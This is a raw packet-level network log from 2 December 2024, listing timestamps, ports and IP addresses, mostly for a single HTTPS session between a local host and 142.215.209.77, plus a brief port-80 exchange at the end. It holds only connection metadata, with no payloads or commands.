Dec 2, 2024 07:38:10.731240988 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.731308937 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.731329918 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.734538078 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.734545946 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.734572887 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.734603882 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.734615088 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.734637976 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.737226009 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.737232924 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.737258911 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.737289906 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.737309933 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.737323046 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.739820957 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.739828110 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.739880085 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.739896059 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.743185997 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.743216038 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.743240118 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.743248940 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.743274927 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.745906115 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.745985985 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.745997906 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.748491049 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.748630047 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.748641968 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.751849890 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.751903057 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.751914978 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.754601955 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.754686117 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.754698992 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.757600069 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.757689953 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.757699966 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.760523081 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.760603905 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.760617018 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.763544083 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.763616085 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.763628960 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.766254902 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.766338110 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.766350985 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.768743038 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.768821001 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.768830061 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.772270918 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.772367001 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.772376060 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.825733900 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.887171030 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.887180090 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.887342930 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.887365103 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.932596922 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.932607889 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.932777882 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.932795048 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.935940981 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.935947895 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.935965061 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.936009884 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.936021090 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.936053038 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.938641071 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.938648939 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.938669920 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.938729048 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.938740015 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.938765049 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.941231012 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.941239119 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.941313982 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.941324949 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.944601059 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.944624901 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.944663048 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.944669962 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.944686890 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.947329998 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.947336912 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.947405100 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.947415113 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.949886084 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.949956894 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.949965000 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.953237057 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.953303099 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.953325033 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.955931902 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.956007004 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.956013918 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.959352970 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.959434032 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.959449053 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.961576939 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.961703062 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.961710930 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.964941025 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.965003967 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.965017080 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.967689037 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.967763901 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.967772961 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.970292091 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.970356941 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.970365047 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.973788023 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:10.973893881 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:10.973902941 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.028804064 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.096513987 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.096534967 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.096628904 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.096642971 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.138192892 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.457606077 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457617044 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457637072 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457758904 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.457823038 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457829952 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457851887 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457882881 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.457890034 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457895994 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457909107 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.457921982 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457928896 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.457963943 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.457963943 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.457978964 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.458844900 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.458960056 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.458969116 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.459335089 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.459408045 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.459414005 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.459424019 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.459467888 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.459474087 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.459484100 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.459530115 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.459537029 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.459603071 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.460403919 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.460464001 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.460473061 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.460479975 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.460515022 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.460541010 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.460545063 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.461280107 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.461338043 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.461384058 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.461384058 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.461395025 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.462631941 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.462692022 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.462699890 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.462819099 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.462877035 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.462888956 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.462896109 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.462946892 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.463824987 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.463895082 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.463908911 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.463987112 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.468370914 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.468452930 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.468470097 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.468527079 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.468580008 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.468595028 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.469441891 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.469547033 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.469554901 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.469629049 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.469675064 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.469707966 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.469716072 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.469727993 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.470568895 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.470617056 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.470643997 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.470654011 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.470719099 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.471462965 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.471544981 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.471551895 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.471595049 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.471647024 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.471654892 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.472218990 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.472301006 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.472310066 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.472464085 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.472548962 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.472557068 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.472619057 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.472692013 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.472701073 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.473516941 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.473599911 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.473627090 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.473648071 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.473670959 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.474562883 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.474620104 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.474637032 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.474644899 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.474669933 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.498230934 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.498361111 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.498373985 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.537377119 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.537587881 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.537606001 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.539787054 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.539917946 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.539931059 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.543523073 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.543625116 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.543637991 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.546454906 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.546612024 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.546633005 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.549468994 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.549587965 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.549596071 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.551914930 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.552002907 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.552011967 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.555284023 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.555349112 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.555358887 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.558005095 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.558085918 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.558094025 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.560565948 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.560657024 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.560664892 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.563707113 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.563800097 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.563807011 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.578811884 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.578942060 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.578953028 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.581926107 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.582041979 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.582051039 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.584762096 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.584845066 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.584851980 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.587563038 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.587622881 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.587631941 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.590854883 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.590961933 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.590972900 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.638221979 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.699923038 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.699930906 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.700046062 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.700067043 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.739231110 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.739427090 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.739445925 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.742221117 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.742244959 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.742314100 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.742326975 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.744829893 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.744858027 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.745008945 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.745018959 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.748204947 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.748430014 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.748440027 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.750870943 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.750976086 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.750984907 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.753736019 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.753810883 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.753818035 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.756386042 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.756473064 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.756481886 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.759560108 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.759665012 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.759674072 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.762389898 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.762531042 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.762542963 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.765166044 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.765264034 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.765273094 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.767967939 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.768083096 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.768095016 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.771290064 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.771384001 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.771393061 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.774560928 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.774657965 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.774667978 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.776655912 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.776793003 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.776801109 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.780849934 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.780931950 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.780956030 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.825692892 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.900986910 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.900998116 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.901068926 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.901083946 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.939955950 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.940073967 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.940085888 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.943509102 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.943536043 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.943608999 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.943618059 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.943667889 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.945147038 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.945230961 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.945238113 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.945261002 CET	443	49716	142.215.209.77	192.168.2.10
Dec 2, 2024 07:38:11.945286989 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.945353985 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:11.947983027 CET	49716	443	192.168.2.10	142.215.209.77
Dec 2, 2024 07:38:28.773351908 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:28.893368959 CET	80	49773	146.70.113.200	192.168.2.10
